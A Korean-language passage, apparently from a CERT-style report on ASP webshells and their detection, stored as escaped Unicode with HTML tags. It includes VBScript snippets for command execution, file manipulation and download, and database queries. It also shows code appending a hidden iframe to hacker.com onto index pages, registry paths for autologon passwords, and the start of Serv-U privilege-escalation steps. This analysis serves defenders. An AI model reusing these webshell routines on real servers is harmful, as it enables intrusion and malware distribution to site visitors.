ASP \uc6f9\uc258 \uc0c1\uc138 \ubd84\uc11d \ubc0f \ud0d0\uc9c0 \ubc29\uc548<\/p>\n
1. \uac1c \uc694<\/p>\n
\uac00. \uc6f9\uc258\uc774\ub780?
\n\uc6f9\uc258\uc774\ub780 \uacf5\uaca9\uc790\uac00 \uc6d0\uaca9\uc5d0\uc11c \ub300\uc0c1 \uc6f9\uc11c\ubc84\uc5d0 \uba85\ub839\uc744 \uc218\ud589\ud560 \uc218 \uc788\ub3c4\ub85d \uc791\uc131\ud55c \uc6f9 \uc2a4\ud06c\ub9bd\ud2b8 (asp, jsp, php, cgi) \ud30c\uc77c\uc774\ub2e4. \uc774\ub54c zip, jpg, doc\uc640 \uac19\uc740 \ub370\uc774\ud130 \ud30c\uc77c\uc885\ub958 \uc774\uc678\uc5d0 \uc545\uc758\uc801\uc73c\ub85c \uc81c\uc791\ub41c \uc2a4\ud06c\ub9bd\ud2b8 \ud30c\uc77c\uc778 \uc6f9\uc258\uc744 \uc5c5\ub85c\ub4dc\ud558\uc5ec \uc6f9 \uc11c\ubc84\ub97c \ud574\ud0b9\ud558\ub294 \uc0ac\uace0\uac00 \ube48\ubc88\ud788 \ubc1c\uc0dd\ud558\uace0 \uc788\ub2e4. \ucd5c\uadfc\uc5d0\ub294 \ud30c\uc77c \uc5c5\ub85c\ub4dc\ubfd0\ub9cc \uc544\ub2c8\ub77c SQL Injection\uacfc \uac19\uc740 \uc6f9 \ucde8\uc57d\uc810\uc744 \uacf5\uaca9\ud55c \ud6c4 \uc9c0\uc18d\uc801\uc73c\ub85c \ud53c\ud574\uc2dc\uc2a4\ud15c\uc744 \uad00\ub9ac\ud560 \ubaa9\uc801\uc73c\ub85c \uc6f9\uc258\uc744 \uc0dd\uc131 \ud55c\ub2e4.<\/p>\n
\uacf5\uaca9\uc790\ub294 \uc6f9\uc258\uc744 \ub300\uc0c1 \uc11c\ubc84\uc5d0 \uc5c5\ub85c\ub4dc\ud55c \ud6c4 \uc6f9\uc744 \uc774\uc6a9\ud558\uc5ec \uc2dc\uc2a4\ud15c \uba85\ub839\uc5b4\ub97c \uc218\ud589\ud558\ubbc0\ub85c \ub124\ud2b8\uc6cc\ud06c \ubc29\ud654\ubcbd \uc601\ud5a5\uc744 \ubc1b\uc9c0 \uc54a\uace0 \uc11c\ubc84\ub97c \uc81c\uc5b4\ud560 \uc218 \uc788\ub2e4. \uc6f9\uc258\uc740 \uc6f9\ud398\uc774\uc9c0 \uc18c\uc2a4\ucf54\ub4dc \uc5f4\ub78c, \uc545\uc131\uc2a4\ud06c\ub9bd\ud2b8 (iframe \ub4f1) \uc0bd\uc785, \ud30c\uc77c \uc5c5\ub85c\ub4dc, \uc11c\ubc84 \ubc0f \ub370\uc774\ud130\ubca0\uc774\uc2a4 \uc790\ub8cc \uc720\ucd9c \ub4f1\uc758 \ub2e4\uc591\ud55c \uacf5\uaca9\uc774 \uac00\ub2a5\ud558\ub2e4.
\n\ucd5c\uadfc \uc6f9\uc258\uc740 \ud0d0\uc9c0\ub97c \uc5b4\ub835\uac8c \ud558\uae30 \uc704\ud574 \uc6f9\uc258\uc758 \uc77c\ubd80\ubd84\ub9cc\uc744 \ud53c\ud574\uc2dc\uc2a4\ud15c\uc5d0 \uc5c5\ub85c\ub4dc \ud558\ub294 \ub4f1 \uadf8 \uc720\ud615\uc774 \ub098\ub0a0\uc774 \ubc1c\uc804\ud558\uace0 \uc788\ub2e4.<\/p>\n
\ub098. \uc6f9\uc258\uc758 \uc704\ud5d8\uc131
\n2007\ub144\ub3c4 \uc778\ud130\ub137\uce68\ud574\uc0ac\uace0\ub300\uc751\uc9c0\uc6d0\uc13c\ud130(www.krcert.or.kr)\uc5d0\uc11c \ud55c \ud574 \ub3d9\uc548 \ubd84\uc11d\ud588\ub358 \ud53c\ud574 \uc6f9\uc11c\ubc84 \uc911 \uc6f9\uc258\uc774 \ubc1c\uacac\ub41c \uc6f9\uc11c\ubc84\ub294 \ucd1d 91%\uc758 \ubd84\ud3ec\ub97c \ubcf4\uc600\ub2e4. \uc774\uac83\uc740 \uacf5\uaca9\uc790\ub4e4\uc774 \ucde8\uc57d\uc810\uc744 \uacf5\uaca9 \ud55c \ud6c4 \uc6f9\uc258\uc744 \uc5c5\ub85c\ub4dc\ud558\uc5ec \uc2dc\uc2a4\ud15c\uc744 \ud1b5\uc81c\ud558\uae30\uac00 \uc218\uc6d4\ud558\ub2e4\ubcf4\ub2c8 \uc0ac\uc6a9 \ube48\ub3c4\uac00 \ub192\uc740 \uac83\uc744 \ud655\uc778\ud560 \uc218 \uc788\ub2e4.<\/p>\n
\uc6f9 \ucde8\uc57d\uc810\uc744 \ud1b5\ud574 \ud53c\ud574\uc2dc\uc2a4\ud15c\uc5d0 \uc811\uadfc\ud55c \uacf5\uaca9\uc790\ub294 \ubc29\ud654\ubcbd\uc5d0\uc11c \uc811\uadfc\uc744 \ud5c8\uc6a9\ud558\ub294 HTTP (80\/tcp) \uc11c\ube44\uc2a4\ub97c \ud1b5\ud574 \ud53c\ud574\uc2dc\uc2a4\ud15c\uc744 \uc81c\uc5b4 \ud558\ubbc0\ub85c \uc6f9\uc258\uc744 \ucc28\ub2e8\ud558\uae30\uac00 \uc27d\uc9c0 \uc54a\ub2e4.<\/p>\n
\ud53c\ud574\uc2dc\uc2a4\ud15c\uc5d0\uc11c \uc218\uc9d1\ub41c ASP \uc6f9\uc258 \uc0d8\ud50c \ud55c \uac1c\ub97c http:\/\/www.virustotal.com \uc0ac\uc774\ud2b8\uc5d0\uc11c \uac01 \ubc14\uc774\ub7ec\uc2a4 \ubc31\uc2e0 \uc5d4\uc9c4 \ud0d0\uc9c0\uacb0\uacfc\ub97c \ud655\uc778\ud558\uc600\ub2e4. \uc544\ub798 \uadf8\ub9bc\uacfc \uac19\uc774 \ub9ce\uc740 \uad6d\ub0b4\uc678 \ubc31\uc2e0\uc0ac\uc5d0\uc11c \ud0d0\uc9c0 \ubabb\ud558\uace0 \uc788\uc73c\uba70 \uacf5\uaca9\uc790\ub4e4\uc740 \uc2a4\ud06c\ub9bd\ud2b8 \uc6f9\uc258\ub4e4\uc744 \ube48\ubc88\ud788 \ubcc0\uacbd\uc2dc\ucf1c \uc0ac\uc6a9\ud558\uae30 \ub54c\ubb38\uc5d0 \ubc31\uc2e0\ub4e4\ub85c\uc11c\ub294 \ud0d0\uc9c0\ud558\uae30\uac00 \uc27d\uc9c0 \uc54a\ub2e4.<\/p>\n
[\uadf8\ub9bc] \uc6f9\uc258 \ubc31\uc2e0\ud0d0\uc9c0 \uacb0\uacfc<\/p>\n
\ub610\ud55c \uc77c\ubc18\uc801\uc778 \uc11c\ubc84\uad00\ub9ac\uc790\ub4e4\uc740 \ud574\ud0b9\uc5ec\ubd80\ub97c \ud655\uc778\ud558\uae30 \ud798\ub4e4\uace0 \ud53c\ud574\ub97c \uc778\uc9c0\ud558\ub354\ub77c\ub3c4 \uad00\ub9ac\uc790\ub4e4\uc774 \uc8fc\ub85c \uc0ac\uc6a9\ud558\ub294 \ubc31\uc2e0 \ud504\ub85c\uadf8\ub7a8\uc5d0\uc11c \uc6f9\uc258 \ud0d0\uc9c0\uac00 \uc548 \ub418\ubbc0\ub85c \uc6f9\uc258\uc744 \ucc3e\uae30\uac00 \uc27d\uc9c0 \uc54a\ub2e4. \uad00\ub9ac\uc790\ub4e4\uc774 \ud574\ud0b9 \ud53c\ud574\ub97c \uc778\uc9c0\ud558\uace0 \uc2dc\uc2a4\ud15c\uc744 \uc7ac\uc124\uce58 \ud558\ub354\ub77c\ub3c4 \uc774\uc804\uc5d0 \uc6f9\uc258\uc774 \uc5c5\ub85c\ub4dc \ub418\uc5b4 \uc788\ub294 \uc18c\uc2a4 \uadf8\ub300\ub85c \uc0c8\ub86d\uac8c \uc124\uce58\ud55c \uc2dc\uc2a4\ud15c\uc5d0 \ubcf5\uc0ac\ud558\uc5ec \uc0ac\uc6a9\ud558\uae30 \ub54c\ubb38\uc5d0 \uc9c0\uc18d\uc801\uc73c\ub85c \uc6f9\uc258\uc744 \uad00\ub9ac\ud558\ub294 \uacf5\uaca9\uc790\uc5d0\uac8c \ud53c\ud574\ub97c \uc785\uac8c \ub41c\ub2e4.<\/p>\n
\ub2e4. \uc6f9\uc258 \ucd5c\uc2e0 \ub3d9\ud5a5
\no \uc778\uc99d\ub41c \uacf5\uaca9\uc790\ub9cc \uc0ac\uc6a9\uac00\ub2a5\ud558\ub3c4\ub85d \ud328\uc2a4\uc6cc\ub4dc\ub97c \uc785\ub825\ubc1b\uac70\ub098, \ud2b9\uc815 \uc138\uc158 \uac12\uc73c\ub85c \uc138\ud305\ud574\uc57c\ub9cc \uae30\ub2a5 \ub4e4\uc744 \uc0ac\uc6a9\ud560 \uc218 \uc788\ub294 \uc6f9\uc258\ub4e4\uc774 \ub9ce\ub2e4.<\/p>\n
[\uadf8\ub9bc] \uc6f9\uc258 \uc0ac\uc6a9\uc790 \uc778\uc99d<\/p>\n
o ASP\uc758 eval, execute \uba54\uc18c\ub4dc \ub4f1\uc740 \uc6d0\uaca9\uc5d0 \uc788\ub294 \uacf5\uaca9\uc790\ub85c\ubd80\ud130 \uc6f9\uc258 \uc2e4\ud589\ucf54\ub4dc\ub97c \uc804\ub2ec \ubc1b\uc544 \uc2e4\ud589 \ud558\ub294\ub370 \ub9ce\uc774 \uc774\uc6a9\ub418\uace0 \uc788\ub2e4. \uc774 \uac19\uc740 Eval, Execute \ucf54\ub4dc\ub294 \uc815\uc0c1\uc801\uc778 \uc2a4\ud06c\ub9bd\ud2b8 \ud30c\uc77c\uc5d0\ub3c4 \uc0bd\uc785\uc774 \uac00\ub2a5\ud574 \uc6f9\uc258 \ud0d0\uc9c0\uac00 \ub354\uc6b1 \uc5b4\ub824\uc6cc\uc9c0\uace0 \uc788\ub2e4.<\/p>\n
o \ucd5c\uadfc \uac01 \ubc31\uc2e0 \uc0ac, \uad00\ub9ac\uc790\ub4e4\uc5d0 \uc758\ud574 \uc6f9\uc258 \ud0d0\uc9c0\uac00 \ub298\uc5b4 \uacf5\uaca9\uc790\ub4e4\uc740 \uc5ec\ub7ec \uae30\ub2a5\uc744 \ud558\ub294 \uc6f9\uc258 \ucf54\ub4dc\ub97c \uac01 \uae30\ub2a5\ubcc4\ub85c \uc6f9\uc258\ub4e4\uc744 \ubd84\ub9ac\ud558\uc5ec \uc0ac\uc6a9\ud558\uace0 \uc788\ub2e4. \uadf8 \uc911 \ud30c\uc77c \uc0dd\uc131 \uae30\ub2a5, DB \ucffc\ub9ac \uae30\ub2a5\uc744 \ud558\ub294 \uc6f9\uc258 \ud30c\uc77c\ub4e4\uc774 \ube48\ubc88\ud558\uac8c \ubc1c\uacac\ub418\uace0 \uc788\ub2e4.<\/p>\n
o ASP \uc2a4\ud06c\ub9bd\ud2b8\uc758 \uacbd\uc6b0 \uc6f9 \uc18c\uc2a4\ub97c \ubcf4\ud638\ud558\uae30 \uc704\ud574 \uc778\ucf54\ub529\ud558\ub294 Script Encoder\ub97c \uc81c\uacf5\ud558\uace0 \uc788\ub2e4.
\n\uc774\ub7ec\ud55c \uc778\ucf54\ub354\ub97c \uc545\uc6a9\ud558\uc5ec \uc6f9\uc258\uc744 \uc778\ucf54\ub529\ud558\uace0 \ubc31\uc2e0\ud0d0\uc9c0\ub97c \uc6b0\ud68c\ud558\uace0 \uc788\ub2e4.<\/p>\n
o \uacf5\uaca9\uc790\ub4e4\uc740 \uc6f9\uc258\uc774 \uc5c5\ub85c\ub4dc \ub418\uc5b4\uc788\ub294 \ud53c\ud574\uc2dc\uc2a4\ud15c \uc6f9\uc258 URL\uc744 \uad00\ub9ac\ud558\uae30 \uc704\ud574 \uad00\ub9ac\ud504\ub85c\uadf8\ub7a8\ub4e4\uc744 \uc0ac\uc6a9\ud558\uace0 \uc788\ub2e4. \uc911\uad6d \ud574\ucee4\ub4e4\uc740 \uc544\ub798\uc640 \uac19\uc740 \uad00\ub9ac\ud504\ub85c\uadf8\ub7a8\uc744 \uac1c\ubc1c\ud558\uc5ec \uc790\uc2e0\ub4e4\uc774 \uc7a5\uc545\ud588\ub358 \ud53c\ud574 \uc0ac\uc774\ud2b8\ub4e4\uc744 \uccb4\uacc4\uc801\uc73c\ub85c \uad00\ub9ac\ud558\uace0 \uc788\ub2e4.<\/p>\n
[\uadf8\ub9bc] \uc6f9\uc258 \uad00\ub9ac \ud504\ub85c\uadf8\ub7a8<\/p>\n
2. ASP \uc6f9\uc258 \uc0c1\uc138 \ubd84\uc11d
\n\ucd5c\uadfc \uad6d\ub0b4\uc5d0\uc11c \ubc1c\uc0dd\ud558\uace0 \uc788\ub294 \ud53c\ud574 \uc2dc\uc2a4\ud15c \uc6f9\uc11c\ubc84 \ub300\ubd80\ubd84\uc740 \uc708\ub3c4\uc6b0\uac00 \ucc28\uc9c0\ud558\uace0 \uc788\ub2e4. \uc708\ub3c4\uc6b0, IIS, ASP \ud658\uacbd\uc758 \uc0ac\uc774\ud2b8\ub4e4\uc774 \ud2b9\ud788 SQL Injection \uacf5\uaca9\uc5d0 \ucde8\uc57d\ud560 \uacbd\uc6b0 \uc774\ub7ec\ud55c \ucde8\uc57d\uc810\uc744 \uc774\uc6a9\ud558\ub294 \uc790\ub3d9\ud654 \uacf5\uaca9 \ub3c4\uad6c\ub4e4\ub85c \uc778\ud574 \uc27d\uac8c \uc545\uc131\ucf54\ub4dc \uc720\ud3ec\uc9c0, \uacbd\uc720\uc9c0\ub85c \uc545\uc6a9\ub418\uace0 \uc788\ub2e4. \uc774\ub7ec\ud55c \uc708\ub3c4\uc6b0 \ud53c\ud574\uc2dc\uc2a4\ud15c\uc744 \uacf5\uaca9\ud558\ub294\ub370 \ub9ce\uc774 \uc0ac\uc6a9\ub418\ub294 ASP \uc6f9\uc258\uc758 \uae30\ub2a5\uacfc \ub3d9\ud5a5\uc5d0 \ub300\ud574 \uc0c1\uc138\ud788 \uc0b4\ud3b4\ubcf4\ub3c4\ub85d \ud558\uaca0\ub2e4.<\/p>\n
\uac00. \uac01 \uae30\ub2a5\ubcc4 \uc6f9\uc258 \ubd84\uc11d<\/p>\n
\u25a0 \uba85\ub839\uc5b4 \ubc0f \uac01\uc885 \uc5b4\ud50c\ub9ac\ucf00\uc774\uc158 \uc2e4\ud589
\nASP \uc6f9\uc258\uc5d0\uc11c\ub294 \uc708\ub3c4\uc6b0\uc5d0\uc11c \uc2dc\uc2a4\ud15c \uba85\ub839\uc5b4\ub098 \uc678\ubd80 \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\ud558\uae30 \uc704\ud574 Wscript.Shell, Shell.Application \uc624\ube0c\uc81d\ud2b8\ub97c \uc774\uc6a9\ud55c\ub2e4. Wscript.Shell \uc624\ube0c\uc81d\ud2b8\ub294 \uba54\uc18c\ub4dc Run, Exec\ub97c \uc774\uc6a9\ud558\uc5ec \uc2dc\uc2a4\ud15c \uba85\ub839\uc5b4 \ubc0f \uc678\ubd80 \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\ud560 \uc218 \uc788\ub2e4.<\/p>\n
o Wscript.Shell
\n– Run (cmd, 0, True)
\n– Exec (cmd)
\nSet WshShell = Server.CreateObject (\u201cWScript.Shell\u201d)
\nCall WshShell.Run (cmd, 0, True)
\nSet WshShell = CreateObject (\u201cWScript.Shell\u201d)
\nSet oExec = WshShell.Exec (cmd)<\/p>\n
\uc2dc\uc2a4\ud15c \uba85\ub839\uc5b4 \ub610\ub294 \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\ud560 \uc218 \uc788\ub294 \ub610 \ub2e4\ub978 \ubc29\ubc95\uc740 Shell.Application \uc624\ube0c\uc81d\ud2b8\uc758
\nShellExecute \uba54\uc18c\ub4dc\ub97c \uc774\uc6a9\ud558\ub294 \uac83\uc774\ub2e4.<\/p>\n
o Shell.Application
\n– Shellexecute\u201c Application\u201d,\u201c Argument\u201d,\u201c Path\u201d,\u201c \u201d, 1
\nset objShell = CreateObject(\u201cShell.Application\u201d)
\nobjShell.ShellExecute \u201cnotepad.exe\u201d, \u201c \u201d, \u201c \u201d, \u201copen\u201d, 1<\/p>\n
\u25a0 \ud30c\uc77c \uc870\uc791
\n\ud30c\uc77c\uad00\ub828 \uc870\uc791\uc740 Scripting.FileSystemObject, Shell.Application, Adodb.Stream \uc624\ube0c\uc81d\ud2b8\ub97c \uc0ac\uc6a9\ud55c\ub2e4. \uc774 \uc911\uc5d0\uc11c Scripting.FileSystemObject, Adodb.Stream \uc744 \uc774\uc6a9\ud55c \ud30c\uc77c \uc870\uc791 \ubc29\ubc95\uc5d0 \ub300\ud574 \uc0b4\ud3b4\ubcf4\ub3c4\ub85d \ud558\uaca0\ub2e4.<\/p>\n
o Scripting.FileSystemObject
\n– \ud30c\uc77c \ub9ac\uc2a4\ud305
\nSet fso = CreateObject(\u201cScripting.FileSystemObject\u201d)
\nSet f = fso.GetFolder(folderpath)
\nSet fp = f.Files
\nFor Each f1 in fp
\ns = s & f1.name
\nNext<\/p>\n
– \ud30c\uc77c \ubcf4\uae30
\nfso\ub294 Scripting.FileSystemObject\ub85c \uc0dd\uc131\ud55c \uc624\ube0c\uc81d\ud2b8\uc774\ub2e4.
\nSet f = fso.OpenTextFile(\u201cc:\\testfile.txt\u201d)
\nra = f.ReadAll<\/p>\n
– \ud30c\uc77c \uc0dd\uc131 \ubc0f \uc218\uc815
\nSet MyFile = fso.CreateTextFile(\u201cc:\\testfile.txt\u201d, True)
\nMyFile.Write Contents<\/p>\n
– \ud30c\uc77c \uc774\ub3d9 \ubc0f \uc0ad\uc81c
\nfso.CopyFile Path1, Path2
\nfso.CopyFolder Path1, Path2
\nfso.DeleteFile Path
\nfso.DeleteFolder Path<\/p>\n
\u25a0 \ud30c\uc77c \ub2e4\uc6b4\ub85c\ub4dc
\no Adodb.Stream
\nSet stream = Server.CreateObject\u201dAdodb.Stream\u201d)
\nstream.Open
\nstream.Type = 1
\nstream.LoadFromFile(Path)
\nResponse.AddHeader \u201cContent-Disposition\u201d, \u201cattachment; filename=\u201d & FileName
\nResponse.AddHeader \u201cContent-Length\u201d, stream.Size
\nResponse.Charset = \u201cUTF-8\u201d
\nResponse.ContentType = \u201capplication\/octet-stream\u201d
\nResponse.BinaryWrite stream.Read
\nResponse.Flush
\nstream.Close
\nSet stream = Nothing<\/p>\n
\u25a0 \ud30c\uc77c \uc5c5\ub85c\ub4dc
\nAdodb.Stream \uc624\ube0c\uc81d\ud2b8\ub97c \uc774\uc6a9\ud558\uc5ec \ud30c\uc77c\uc744 \uc5c5\ub85c\ub4dc \ud55c\ub2e4. \uad00\ub828 \uba54\uc18c\ub4dc\ub4e4\uc740 \uc544\ub798\uc640 \uac19\ub2e4.
\n\u203b \uad6c\ud604 \uc608\uc81c \ucf54\ub4dc \uc0dd\ub7b5
\no Adodb.Stream
\n– Write
\n– Read
\n– SaveToFile<\/p>\n
\u25a0 \uc6f9\ud398\uc774\uc9c0\ub4e4\uc5d0 \uc545\uc131\uc2a4\ud06c\ub9bd\ud2b8 \uc0bd\uc785 \uae30\ub2a5
\n\uc6f9\uc258\uc5d0\uc11c\ub294 \uc545\uc131\ucf54\ub4dc\ub97c \uc720\ud3ec\ud558\uae30 \uc704\ud574 \uac01 html \ud30c\uc77c\ub4e4\uc774\ub098 \uc2a4\ud06c\ub9bd\ud2b8 \ud30c\uc77c\uc5d0 \uc545\uc131 \uc2a4\ud06c\ub9bd\ud2b8 (iframe)\ub97c \uc0bd\uc785\ud558\ub294 \uae30\ub2a5\uc774 \uc788\ub2e4.<\/p>\n
o \uc815\uaddc\ud45c\ud604\uc2dd\uc73c\ub85c \uc544\ub798\uc640 \uac19\uc774 \uc545\uc131\uc2a4\ud06c\ub9bd\ud2b8\ub97c \uc0bd\uc785\ud560 \ud30c\uc77c\uba85\uc744 \uc815\uc758\ud55c\ub2e4. default, index main \ub4f1 \ud648\ud398\uc774\uc9c0 \uba54\uc778\ud398\uc774\uc9c0 \uc774\ub984\uc744 \uac16\ub294 html \ud30c\uc77c\ub4e4\uc774\ub098 \uc2a4\ud06c\ub9bd\ud2b8 \ud30c\uc77c\ub4e4\uc744 \uc815\uaddc\ud45c\ud604 \uc2dd\uc73c\ub85c \ucc3e\ub294\ub2e4.
\n– (\\\\|\\\/)(default|index|main|admin)\\.(htm|html|asp|php|jsp|aspx)\\b<\/p>\n
o \uadf8\ub9ac\uace0 \uc544\ub798\uc640 \uac19\uc740 iframe \uc545\uc131 \uc2a4\ud06c\ub9bd\ud2b8 \ucf54\ub4dc\ub97c \uc0bd\uc785\ud55c\ub2e4.
\n– <iframe src=http:\/\/hacker.com\/m.htm width=0 height=0><\/iframe>
\n\u25c8 \uc815\uaddc \ud45c\ud604\uc2dd\uc73c\ub85c \ud30c\uc77c\uc774\ub984\uc744 \uac80\uc0ac\ud558\uc5ec \uba54\uc778 \ud398\uc774\uc9c0\ub97c \ucc3e\ub294\ub2e4.
\nSet regEx=New RegExp
\nregEx.Pattern=\u201d(\uff3c\uff3c|\uff3c\/)(default|index|main|admin)\\.(htm|html|asp|php|jsp|aspx)\uff3cb\u201d
\nregEx.IgnoreCase=True
\nretVal=regEx.Test(path)<\/p>\n
\u25c8 \uc704 \uc815\uaddc \ud45c\ud604\uc2dd\uc73c\ub85c \uac80\uc0c9\ub41c \ud30c\uc77c\uc758 \ub05d\uc5d0 iframe \ucf54\ub4dc\ub97c \uc0bd\uc785\ud55c\ub2e4.
\nSet fs=Server.createObject(\u201cScripting.FileSystemObject\u201d)
\nSet f=fs.GetFile(path)
\nSet f_addcode=f.OpenAsTextStream(8,-2) \/\/ \ud3ec\uc778\ud130\ub294 \ud30c\uc77c \ub05d\uc73c\ub85c \uc774\ub3d9\ud558\uace0 \uc4f0\uae30 \ubaa8\ub4dc\ub85c \uc5f0\ub2e4
\nf_addcode.Write \u201c<iframe src=http:\/\/hacker.com\/m.htm width=0
\nheight=0><\/iframe>\u201d
\nf_addcode.Close<\/p>\n
\u25a0 \ub370\uc774\ud130\ubca0\uc774\uc2a4 \uc5f4\ub78c \ubc0f \uc870\uc791
\n\ub370\uc774\ud130\ubca0\uc774\uc2a4\uc5d0 \uc811\uc18d\ud558\uae30 \uc704\ud574\uc11c\ub294 Adodb.Connection \uc624\ube0c\uc81d\ud2b8\ub97c \uc0ac\uc6a9\ud558\uace0 \uc544\ub798\uc640 \uac19\uc740 \uba54\uc18c\ub4dc\ub97c \uc774\uc6a9\ud558\uc5ec \ub370\uc774\ud130\ubca0\uc774\uc2a4 \uc5f0\uacb0 \ubc0f SQL \ucffc\ub9ac \ubb38\ub4e4\uc744 \uc2e4\ud589\ud560 \uc218 \uc788\ub2e4.
\nSet Con = Server.CreateObject(\u201cAdodb.Connection\u201d)
\nCon.Open \u201cProvider=SQLOLEDB;Data
\nSource=SERVER_NAME;database=DB_NAME;uid=UID;pwd=PWD\u201d
\nSQL = \u201cSELECT * FROM table\u201d
\nSet RS = Con.Execute(SQL)<\/p>\n
\u25a0 \ub808\uc9c0\uc2a4\ud2b8\ub9ac \uc870\uc791
\n\uc708\ub3c4\uc6b0\ub294 \ubaa8\ub4e0 \uc2dc\uc2a4\ud15c \uad6c\uc131 \uc815\ubcf4\ub098 \uc0ac\uc6a9\uc790 \uc124\uc815 \uc815\ubcf4\ub97c \ub808\uc9c0\uc2a4\ud2b8\ub9ac\uc5d0 \uc800\uc7a5\ud55c\ub2e4. \uc6f9\uc258\uc5d0\uc11c\ub294 \uc544\ub798\uc640 \uac19\uc740 Wscript.Shell \uc624\ube0c\uc81d\ud2b8\uc640 \uad00\ub828 \uba54\uc18c\ub4dc\ub97c \uc774\uc6a9\ud558\uc5ec \ub808\uc9c0\uc2a4\ud2b8\ub9ac \ud655\uc778 \ubc0f \uc870\uc791 \ud55c\ub2e4.<\/p>\n
\u203b \uad6c\ud604 \uc608\uc81c \ucf54\ub4dc \uc0dd\ub7b5
\no Wscript.Shell
\n– RegRead
\n– RegWrite
\n– RegDelete
\n\uc6f9\uc258\uc5d0\uc11c \ucc38\uc870\ud558\ub294 \ub808\uc9c0\uc2a4\ud2b8\ub9ac \uac12\ub4e4\uc740 \uc544\ub798\uc640 \uac19\ub2e4.
\n– \ud130\ubbf8\ub110 \uc11c\ube44\uc2a4 \ud3ec\ud2b8, PortNumber \ud0a4 \uac12 \ubcc0\uacbd
\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\
\n– \uc708\ub3c4\uc6b0 \uc790\ub3d9\uc73c\ub85c \ub85c\uadf8\uc778 \ud0a4 \uac12(autoadminlogon)\uc774 \uc124\uc815\ub418\uc5b4 \uc788\ub294 \uacbd\uc6b0 \ub514\ud3f4\ud2b8 \uc0ac\uc6a9\uc790 \uc774\ub984
\n(DefaultUserName)\uacfc \ud328\uc2a4\uc6cc\ub4dc(DefaultPassword)\ub97c \ud655\uc778
\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\
\n– \ucef4\ud4e8\ud130 \uc774\ub984 \ud655\uc778
\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ComputerName\\ComputerName
\n– \uc775\uba85 \uc0ac\uc6a9\uc790 \uc811\uc18d \uc5ec\ubd80 \ubc0f \uacf5\uc720 \uc815\ubcf4 \ud655\uc778
\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\restrictanonymous
\nHKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\AutoShareServer
\nHKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\EnableSha
\nredNetDrives
\n– \ubcf4\uc548 \ud544\ud130\ub9c1 \ubc0f \ud3ec\uc6cc\ub529 \uc5ec\ubd80 \ud655\uc778
\nHKLM\\SYSTEM\\currentControlSet\\Services\\Tcpip\\Parameters\\EnableSecurityFilters
\nHKLM\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\IPEnableRouter
\n– \ub124\ud2b8\uc6cc\ud06c \uce74\ub4dc \uc815\ubcf4 \ud655\uc778
\nHKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{8A465128
\n-8E99-4B0C-AFF3-1348DC55EB2E}\\DefaultGateway
\nHKLM\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Enum\\Count
\nHKLM\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Linkage\\Bind<\/p>\n
\u25a0 \uc2dc\uc2a4\ud15c \uc815\ubcf4 \ud655\uc778
\n\uc6f9\uc258\uc5d0\uc11c GetObject \uba54\uc18c\ub4dc\ub97c \uc774\uc6a9\ud574 \uc11c\ube44\uc2a4\uc640 \uc0ac\uc6a9\uc790 \uc7a5\ubcf4\ub97c \ud655\uc778 \ud55c\ub2e4.<\/p>\n
o \uc11c\ube44\uc2a4 \ud655\uc778
\nSet ComputerObj = GetObject(\u201cWinNT:\/\/MYCOMPUTER\u201d)
\nComputerObj.Filter = Array(\u201cService\u201d)
\nFor Each Service in ComputerObj
\nWScript.Echo \u201cService display name = \u201c & Service.DisplayName
\nWScript.Echo \u201cService account name = \u201c & Service.ServiceAccountName
\nWScript.Echo \u201cService executable = \u201c & Service.Path
\nWScript.Echo \u201cCurrent status = \u201c & Service.Status
\nNext<\/p>\n
o \uc0ac\uc6a9\uc790 \uc815\ubcf4\ud655\uc778
\nSet objComputer = GetObject(\u201cWinNT:\/\/.\u201d)
\nobjComputer.Filter = Array(\u201cUser\u201d)
\nFor Each objUser in objComputer
\nWScript.Echo objUser.Name
\nNext<\/p>\n
\u25a0 \uc5b4\ud50c\ub9ac\ucf00\uc774\uc158 \ucde8\uc57d\uc810\uc744 \ud1b5\ud55c \ub85c\uceec \uad8c\ud55c\uc0c1\uc2b9<\/p>\n
\uc6f9\uc5d0\uc11c \uc2e4\ud589\ub418\ub294 \ubaa8\ub4e0 \ud30c\uc77c\ub4e4\uc740 \uae30\ubcf8\uc801\uc73c\ub85c \uc778\ud130\ub137 \uac8c\uc2a4\ud2b8 \uacc4\uc815\uc73c\ub85c \uc73c\ub85c \uc2e4\ud589\ub41c\ub2e4. \uc6f9\uc258\uc740 \uc774\ub7ec\ud55c \uc81c\ud55c\ub41c \uad8c\ud55c\uc744 \uad00\ub9ac\uc790 \uad8c\ud55c\uc73c\ub85c \uc0c1\uc2b9\uc2dc\ud0a4\uae30 \uc704\ud574 \ucde8\uc57d\uc810 \uc788\ub294 Serv-U \ud504\ub85c\uadf8\ub7a8\uc744 \uc774\uc6a9\ud55c\ub2e4.
\nServ-U 3.x ~ 5.x\ub294 \ub85c\uceec \uad8c\ud55c \uc0c1\uc2b9 \ucde8\uc57d\uc810\uc774 \uc788\uc73c\uba70 \uc774\ub97c \uc774\uc6a9\ud558\uc5ec \uc0c8\ub85c\uc6b4 \uad00\ub9ac\uc790 \uacc4\uc815\uc744 \uc0dd\uc131\ud560 \uc218 \uc788\ub2e4. \ucde8\uc57d\uc810\uc744 \uacf5\uaca9\ud558\ub294 \uacfc\uc815\uc740 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n
o Serv-U 3.x ~ 5.x \ubc84\uc804\uc758 ServUDaemon.exe \ub2e4\uc6b4\ub85c\ub4dc \ubc0f \uc2e4\ud589 (TzoLibr.dll \ud544\uc694)
\no Serv-U \ub514\ud3f4\ud2b8 \uc544\uc774\ud53c\/\ud3ec\ud2b8(127.0.0.1\/43958) \ub85c \uc811\uc18d \ud6c4
